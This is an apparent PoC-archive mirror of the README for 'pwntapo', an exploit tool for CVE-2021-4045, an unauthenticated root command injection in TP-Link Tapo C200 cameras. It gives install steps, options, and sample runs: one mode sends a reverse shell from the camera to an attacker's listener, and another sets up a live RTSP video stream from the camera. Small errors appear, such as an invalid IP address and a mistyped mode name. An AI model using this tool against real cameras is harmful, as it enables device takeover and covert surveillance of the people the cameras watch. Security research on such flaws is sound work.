Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-4045 PoC β€” TP-LINK Tapo C200 remote code execution vulnerability

Source
https://github.com/B3nj4h/CVE-2021-4045
Associated Vulnerability
Title:TP-LINK Tapo C200 remote code execution vulnerability (CVE-2021-4045)
Description:TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
Description
πŸ” "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" πŸ”“
Readme
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)

πŸ” "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" πŸ”“

Read about the exploit from [exploit db](https://www.exploit-db.com/exploits/51017)

This is a command injection vulnerability that affect all  TP-Link Tapo c200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works read this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce)

## Installation
```
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)
```

The exploit has two modes SHELL and RSTP. 

## SHELL
In the shell mode you need to provide the victim ip, attacker ip and the listening port only and this will spawn a root shell in the device. 
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887
```
## RSTP
In the RSTP mode you'll need to provide the RSTP_USER, PASSWORD AND CIPHERTEXT to be able to get a live footage from the camera
```shell
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION
File Snapshot

 [4.0K]  /data/pocs/4cf2deb0ad07f39e2a57b41f6d77f5e1d85cb00e
β”œβ”€β”€ [4.2K]  pwntapo.py
β”œβ”€β”€ [4.2K]  README.md
└── [  48]  requirements.txt

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’